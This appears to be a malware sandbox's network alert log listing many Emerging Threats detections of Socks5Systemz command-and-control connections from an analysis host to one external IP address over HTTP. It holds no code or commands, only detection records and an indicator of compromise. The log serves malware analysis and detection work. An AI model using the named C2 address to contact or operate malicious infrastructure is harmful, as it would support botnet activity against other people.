2024-11-15T14:18:18.619893+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50749	185.208.158.202	80	TCP

ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T14:09:06.842987+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50750	185.208.158.202	80	TCP
2024-11-15T14:11:14.109241+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50117	185.208.158.202	80	TCP
2024-11-15T14:11:17.265718+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50117	185.208.158.202	80	TCP
2024-11-15T14:11:18.315529+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50121	185.208.158.202	80	TCP
2024-11-15T14:11:19.340795+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50123	185.208.158.202	80	TCP
2024-11-15T14:11:20.391584+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50125	185.208.158.202	80	TCP
2024-11-15T14:11:21.694091+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50127	185.208.158.202	80	TCP
2024-11-15T14:11:22.731846+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50129	185.208.158.202	80	TCP
2024-11-15T14:11:23.803766+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50131	185.208.158.202	80	TCP
2024-11-15T14:11:24.848538+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50133	185.208.158.202	80	TCP
2024-11-15T14:11:25.885986+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50136	185.208.158.202	80	TCP
2024-11-15T14:11:26.303346+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50136	185.208.158.202	80	TCP
2024-11-15T14:11:27.333374+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50139	185.208.158.202	80	TCP
2024-11-15T14:11:29.412761+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50142	185.208.158.202	80	TCP
2024-11-15T14:11:30.454383+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50143	185.208.158.202	80	TCP
2024-11-15T14:11:31.491576+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50146	185.208.158.202	80	TCP
2024-11-15T14:11:32.531881+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50148	185.208.158.202	80	TCP
2024-11-15T14:11:33.840497+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50151	185.208.158.202	80	TCP
2024-11-15T14:11:34.881440+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50153	185.208.158.202	80	TCP
2024-11-15T14:11:35.935800+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50156	185.208.158.202	80	TCP
2024-11-15T14:11:37.389803+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50158	185.208.158.202	80	TCP
2024-11-15T14:11:38.436489+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50160	185.208.158.202	80	TCP
2024-11-15T14:11:39.486368+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50162	185.208.158.202	80	TCP
2024-11-15T14:11:40.525171+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50163	185.208.158.202	80	TCP
2024-11-15T14:11:41.574214+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50165	185.208.158.202	80	TCP
2024-11-15T14:11:42.003672+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50165	185.208.158.202	80	TCP
2024-11-15T14:11:43.563186+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50166	185.208.158.202	80	TCP
2024-11-15T14:11:44.766294+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50168	185.208.158.202	80	TCP
2024-11-15T14:11:45.796735+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50169	185.208.158.202	80	TCP
2024-11-15T14:11:47.058641+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50171	185.208.158.202	80	TCP
2024-11-15T14:11:47.478330+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50171	185.208.158.202	80	TCP
2024-11-15T14:11:48.602771+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50172	185.208.158.202	80	TCP
2024-11-15T14:11:49.741912+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50175	185.208.158.202	80	TCP
2024-11-15T14:11:50.866576+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50176	185.208.158.202	80	TCP
2024-11-15T14:11:51.936796+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50178	185.208.158.202	80	TCP
2024-11-15T14:11:53.056549+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50180	185.208.158.202	80	TCP
2024-11-15T14:11:53.490407+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50180	185.208.158.202	80	TCP
2024-11-15T14:11:54.627653+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50182	185.208.158.202	80	TCP
2024-11-15T14:11:55.696513+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50184	185.208.158.202	80	TCP
2024-11-15T14:11:56.115659+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50184	185.208.158.202	80	TCP
2024-11-15T14:11:57.165798+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50185	185.208.158.202	80	TCP
2024-11-15T14:11:57.598625+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50185	185.208.158.202	80	TCP
2024-11-15T14:11:58.019649+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50185	185.208.158.202	80	TCP
2024-11-15T14:11:59.153743+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50187	185.208.158.202	80	TCP
2024-11-15T14:11:59.570488+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50187	185.208.158.202	80	TCP
2024-11-15T14:12:00.602012+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50190	185.208.158.202	80	TCP
2024-11-15T14:12:01.667170+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50191	185.208.158.202	80	TCP
2024-11-15T14:12:02.093683+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50191	185.208.158.202	80	TCP
2024-11-15T14:12:03.632226+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50193	185.208.158.202	80	TCP
2024-11-15T14:12:04.664053+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50196	185.208.158.202	80	TCP
2024-11-15T14:12:05.700728+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50198	185.208.158.202	80	TCP
2024-11-15T14:12:06.113804+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50198	185.208.158.202	80	TCP
2024-11-15T14:12:07.147647+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50200	185.208.158.202	80	TCP
2024-11-15T14:12:08.183747+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50201	185.208.158.202	80	TCP
2024-11-15T14:12:09.221572+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50203	185.208.158.202	80	TCP
2024-11-15T14:12:09.630312+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50203	185.208.158.202	80	TCP
2024-11-15T14:12:10.672454+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50204	185.208.158.202	80	TCP
2024-11-15T14:12:11.707826+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50206	185.208.158.202	80	TCP
2024-11-15T14:12:12.824356+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50209	185.208.158.202	80	TCP
2024-11-15T14:12:13.863430+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50210	185.208.158.202	80	TCP
2024-11-15T14:12:14.896052+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50213	185.208.158.202	80	TCP
2024-11-15T14:12:15.936115+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50214	185.208.158.202	80	TCP
2024-11-15T14:12:16.970181+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50216	185.208.158.202	80	TCP
2024-11-15T14:12:18.015550+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50217	185.208.158.202	80	TCP
2024-11-15T14:12:19.060564+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50219	185.208.158.202	80	TCP
2024-11-15T14:12:20.098532+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50220	185.208.158.202	80	TCP
2024-11-15T14:12:21.161791+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50221	185.208.158.202	80	TCP
2024-11-15T14:12:22.201538+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50223	185.208.158.202	80	TCP
2024-11-15T14:12:23.234962+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50224	185.208.158.202	80	TCP
2024-11-15T14:12:24.290699+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50226	185.208.158.202	80	TCP
2024-11-15T14:12:25.333880+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50227	185.208.158.202	80	TCP
2024-11-15T14:12:26.382513+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50228	185.208.158.202	80	TCP
2024-11-15T14:12:27.419709+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50230	185.208.158.202	80	TCP
2024-11-15T14:12:28.683776+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50231	185.208.158.202	80	TCP
2024-11-15T14:12:29.734107+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50234	185.208.158.202	80	TCP
2024-11-15T14:12:30.838905+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50235	185.208.158.202	80	TCP
2024-11-15T14:12:31.889524+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50238	185.208.158.202	80	TCP
2024-11-15T14:12:32.948211+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50239	185.208.158.202	80	TCP
2024-11-15T14:12:34.015369+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50243	185.208.158.202	80	TCP
2024-11-15T14:12:35.135286+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50245	185.208.158.202	80	TCP
2024-11-15T14:12:36.269129+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50248	185.208.158.202	80	TCP
2024-11-15T14:12:37.353922+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50250	185.208.158.202	80	TCP
2024-11-15T14:12:38.443800+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50253	185.208.158.202	80	TCP
2024-11-15T14:12:39.629992+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50256	185.208.158.202	80	TCP
2024-11-15T14:12:40.790128+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50257	185.208.158.202	80	TCP
2024-11-15T14:12:41.917383+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50259	185.208.158.202	80	TCP
2024-11-15T14:12:42.959911+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50260	185.208.158.202	80	TCP
2024-11-15T14:12:43.990763+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50261	185.208.158.202	80	TCP
2024-11-15T14:12:45.022363+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50263	185.208.158.202	80	TCP
2024-11-15T14:12:46.122353+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50264	185.208.158.202	80	TCP
2024-11-15T14:12:47.215602+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50266	185.208.158.202	80	TCP
2024-11-15T14:12:48.276020+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50267	185.208.158.202	80	TCP
2024-11-15T14:12:49.341331+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50271	185.208.158.202	80	TCP
2024-11-15T14:12:50.405299+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50272	185.208.158.202	80	TCP
2024-11-15T14:12:51.464185+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50273	185.208.158.202	80	TCP
2024-11-15T14:12:52.500525+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50275	185.208.158.202	80	TCP
2024-11-15T14:12:53.558650+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50276	185.208.158.202	80	TCP
2024-11-15T14:12:54.586854+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50278	185.208.158.202	80	TCP
2024-11-15T14:12:55.623856+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50279	185.208.158.202	80	TCP
2024-11-15T14:12:56.697827+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50281	185.208.158.202	80	TCP
2024-11-15T14:12:57.740257+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50282	185.208.158.202	80	TCP
2024-11-15T14:12:58.790783+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50283	185.208.158.202	80	TCP
2024-11-15T14:12:59.846970+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50285	185.208.158.202	80	TCP
2024-11-15T14:13:00.899388+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50286	185.208.158.202	80	TCP
2024-11-15T14:13:01.929729+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50288	185.208.158.202	80	TCP
2024-11-15T14:13:02.974611+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50289	185.208.158.202	80	TCP
2024-11-15T14:13:04.018581+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50291	185.208.158.202	80	TCP
2024-11-15T14:13:05.089152+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50293	185.208.158.202	80	TCP
2024-11-15T14:13:06.136791+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50297	185.208.158.202	80	TCP
2024-11-15T14:13:07.183416+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50299	185.208.158.202	80	TCP
2024-11-15T14:13:08.229320+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50301	185.208.158.202	80	TCP
2024-11-15T14:13:09.276405+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50303	185.208.158.202	80	TCP
2024-11-15T14:13:10.333101+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50305	185.208.158.202	80	TCP
2024-11-15T14:13:11.373209+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50306	185.208.158.202	80	TCP
2024-11-15T14:13:12.422655+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50308	185.208.158.202	80	TCP
2024-11-15T14:13:13.491599+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50309	185.208.158.202	80	TCP
2024-11-15T14:13:14.519804+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50311	185.208.158.202	80	TCP
2024-11-15T14:13:15.559079+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50315	185.208.158.202	80	TCP
2024-11-15T14:13:16.639836+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50317	185.208.158.202	80	TCP
2024-11-15T14:13:17.685660+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50318	185.208.158.202	80	TCP
2024-11-15T14:13:18.716927+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50319	185.208.158.202	80	TCP
2024-11-15T14:13:19.743109+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50321	185.208.158.202	80	TCP
2024-11-15T14:13:20.810418+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50322	185.208.158.202	80	TCP
2024-11-15T14:13:21.863536+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50324	185.208.158.202	80	TCP
2024-11-15T14:13:22.908176+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50325	185.208.158.202	80	TCP
2024-11-15T14:13:23.957122+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50326	185.208.158.202	80	TCP
2024-11-15T14:13:25.409256+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50328	185.208.158.202	80	TCP
2024-11-15T14:13:26.462165+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50329	185.208.158.202	80	TCP
2024-11-15T14:13:27.531329+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50331	185.208.158.202	80	TCP
2024-11-15T14:13:28.563722+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50332	185.208.158.202	80	TCP
2024-11-15T14:13:29.600461+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50334	185.208.158.202	80	TCP
2024-11-15T14:13:30.630134+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50335	185.208.158.202	80	TCP
2024-11-15T14:13:31.665188+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50336	185.208.158.202	80	TCP
2024-11-15T14:13:32.702612+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50338	185.208.158.202	80	TCP
2024-11-15T14:13:33.738435+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50339	185.208.158.202	80	TCP
2024-11-15T14:13:34.784168+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50341	185.208.158.202	80	TCP
2024-11-15T14:13:35.820264+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50342	185.208.158.202	80	TCP
2024-11-15T14:13:36.862364+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50343	185.208.158.202	80	TCP
2024-11-15T14:13:37.899410+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50345	185.208.158.202	80	TCP
2024-11-15T14:13:38.932244+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50346	185.208.158.202	80	TCP
2024-11-15T14:13:39.993738+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50347	185.208.158.202	80	TCP
2024-11-15T14:13:41.068024+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50349	185.208.158.202	80	TCP
2024-11-15T14:13:42.561665+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50351	185.208.158.202	80	TCP
2024-11-15T14:13:43.621704+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50352	185.208.158.202	80	TCP
2024-11-15T14:13:44.673400+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50354	185.208.158.202	80	TCP
2024-11-15T14:13:45.720399+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50355	185.208.158.202	80	TCP
2024-11-15T14:13:46.749478+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50356	185.208.158.202	80	TCP
2024-11-15T14:13:47.806924+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50358	185.208.158.202	80	TCP
2024-11-15T14:13:48.863883+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50359	185.208.158.202	80	TCP
2024-11-15T14:13:49.904728+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50361	185.208.158.202	80	TCP
2024-11-15T14:13:50.959178+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50362	185.208.158.202	80	TCP
2024-11-15T14:13:51.983445+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50364	185.208.158.202	80	TCP
2024-11-15T14:13:53.019759+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50365	185.208.158.202	80	TCP
2024-11-15T14:13:54.063931+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50366	185.208.158.202	80	TCP
2024-11-15T14:13:55.116683+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50368	185.208.158.202	80	TCP
2024-11-15T14:13:56.139190+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50369	185.208.158.202	80	TCP
2024-11-15T14:13:57.183444+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50372	185.208.158.202	80	TCP
2024-11-15T14:13:58.238085+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50373	185.208.158.202	80	TCP
2024-11-15T14:13:59.285727+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50374	185.208.158.202	80	TCP
2024-11-15T14:14:00.311949+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50377	185.208.158.202	80	TCP
2024-11-15T14:14:01.360746+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50378	185.208.158.202	80	TCP
2024-11-15T14:14:02.398525+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50380	185.208.158.202	80	TCP
2024-11-15T14:14:03.433188+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50381	185.208.158.202	80	TCP
2024-11-15T14:14:04.476607+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50383	185.208.158.202	80	TCP
2024-11-15T14:14:05.503954+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50385	185.208.158.202	80	TCP
2024-11-15T14:14:06.581792+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50386	185.208.158.202	80	TCP
2024-11-15T14:14:07.624874+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50388	185.208.158.202	80	TCP
2024-11-15T14:14:08.970106+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50389	185.208.158.202	80	TCP
2024-11-15T14:14:10.006389+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50392	185.208.158.202	80	TCP
2024-11-15T14:14:11.048804+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50393	185.208.158.202	80	TCP
2024-11-15T14:14:12.129040+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50395	185.208.158.202	80	TCP
2024-11-15T14:14:13.159067+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50396	185.208.158.202	80	TCP
2024-11-15T14:14:14.191143+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50397	185.208.158.202	80	TCP
2024-11-15T14:14:15.234664+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50399	185.208.158.202	80	TCP
2024-11-15T14:14:16.265507+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50400	185.208.158.202	80	TCP
2024-11-15T14:14:17.297498+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50402	185.208.158.202	80	TCP
2024-11-15T14:14:18.385973+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50403	185.208.158.202	80	TCP
2024-11-15T14:14:19.440542+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50405	185.208.158.202	80	TCP
2024-11-15T14:14:20.489361+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50407	185.208.158.202	80	TCP
2024-11-15T14:14:21.561358+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50408	185.208.158.202	80	TCP
2024-11-15T14:14:22.592532+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50410	185.208.158.202	80	TCP
2024-11-15T14:14:23.661589+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50411	185.208.158.202	80	TCP
2024-11-15T14:14:24.697930+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50413	185.208.158.202	80	TCP
2024-11-15T14:14:25.721830+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50414	185.208.158.202	80	TCP
2024-11-15T14:14:26.755064+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50415	185.208.158.202	80	TCP
2024-11-15T14:14:27.809403+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50417	185.208.158.202	80	TCP
2024-11-15T14:14:28.891512+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50418	185.208.158.202	80	TCP
2024-11-15T14:14:29.955404+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50422	185.208.158.202	80	TCP
2024-11-15T14:14:30.993400+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50423	185.208.158.202	80	TCP
2024-11-15T14:14:32.031991+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50425	185.208.158.202	80	TCP
2024-11-15T14:14:33.290461+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50426	185.208.158.202	80	TCP
2024-11-15T14:14:34.351729+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50427	185.208.158.202	80	TCP
2024-11-15T14:14:35.393083+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50429	185.208.158.202	80	TCP
2024-11-15T14:14:36.431347+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50430	185.208.158.202	80	TCP
2024-11-15T14:14:37.522179+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50432	185.208.158.202	80	TCP
2024-11-15T14:14:38.937917+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50433	185.208.158.202	80	TCP
2024-11-15T14:14:39.989855+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50437	185.208.158.202	80	TCP
2024-11-15T14:14:41.054843+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50438	185.208.158.202	80	TCP
2024-11-15T14:14:42.100907+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50441	185.208.158.202	80	TCP
2024-11-15T14:14:43.500951+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50442	185.208.158.202	80	TCP
2024-11-15T14:14:44.609679+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50444	185.208.158.202	80	TCP
2024-11-15T14:14:45.672065+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50445	185.208.158.202	80	TCP
2024-11-15T14:14:46.775848+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50446	185.208.158.202	80	TCP
2024-11-15T14:14:47.837525+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50448	185.208.158.202	80	TCP
2024-11-15T14:14:50.247076+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50449	185.208.158.202	80	TCP
2024-11-15T14:14:51.284595+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50451	185.208.158.202	80	TCP
2024-11-15T14:14:52.339090+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50454	185.208.158.202	80	TCP
2024-11-15T14:14:53.379193+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50455	185.208.158.202	80	TCP
2024-11-15T14:14:54.418422+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50456	185.208.158.202	80	TCP
2024-11-15T14:14:55.652660+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50458	185.208.158.202	80	TCP
2024-11-15T14:14:56.679675+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50459	185.208.158.202	80	TCP
2024-11-15T14:14:57.708531+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50461	185.208.158.202	80	TCP
2024-11-15T14:14:58.747617+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50462	185.208.158.202	80	TCP
2024-11-15T14:14:59.779522+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50463	185.208.158.202	80	TCP
2024-11-15T14:15:00.814226+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50465	185.208.158.202	80	TCP
2024-11-15T14:15:01.848087+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50467	185.208.158.202	80	TCP
2024-11-15T14:15:02.883163+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50469	185.208.158.202	80	TCP
2024-11-15T14:15:03.927779+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50470	185.208.158.202	80	TCP
2024-11-15T14:15:04.964066+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50473	185.208.158.202	80	TCP
2024-11-15T14:15:06.034462+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50474	185.208.158.202	80	TCP
2024-11-15T14:15:07.490581+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50475	185.208.158.202	80	TCP
2024-11-15T14:15:08.536462+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50477	185.208.158.202	80	TCP
2024-11-15T14:15:09.578171+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50478	185.208.158.202	80	TCP
2024-11-15T14:15:10.602047+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50480	185.208.158.202	80	TCP
2024-11-15T14:15:11.667508+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50482	185.208.158.202	80	TCP
2024-11-15T14:15:12.714483+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50484	185.208.158.202	80	TCP
2024-11-15T14:15:13.757442+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50485	185.208.158.202	80	TCP
2024-11-15T14:15:14.795943+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50486	185.208.158.202	80	TCP
2024-11-15T14:15:15.820095+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50488	185.208.158.202	80	TCP
2024-11-15T14:15:16.863716+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50489	185.208.158.202	80	TCP
2024-11-15T14:15:17.894974+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50491	185.208.158.202	80	TCP
2024-11-15T14:15:18.927912+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50492	185.208.158.202	80	TCP
2024-11-15T14:15:20.709747+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50493	185.208.158.202	80	TCP
2024-11-15T14:15:21.739303+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50496	185.208.158.202	80	TCP
2024-11-15T14:15:22.784426+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50497	185.208.158.202	80	TCP
2024-11-15T14:15:23.826425+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50499	185.208.158.202	80	TCP
2024-11-15T14:15:24.890845+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50500	185.208.158.202	80	TCP
2024-11-15T14:15:25.948117+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50502	185.208.158.202	80	TCP
2024-11-15T14:15:26.991045+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50503	185.208.158.202	80	TCP
2024-11-15T14:15:28.025218+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50504	185.208.158.202	80	TCP
2024-11-15T14:15:29.094358+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50506	185.208.158.202	80	TCP
2024-11-15T14:15:30.132166+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50507	185.208.158.202	80	TCP
2024-11-15T14:15:31.180105+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50509	185.208.158.202	80	TCP
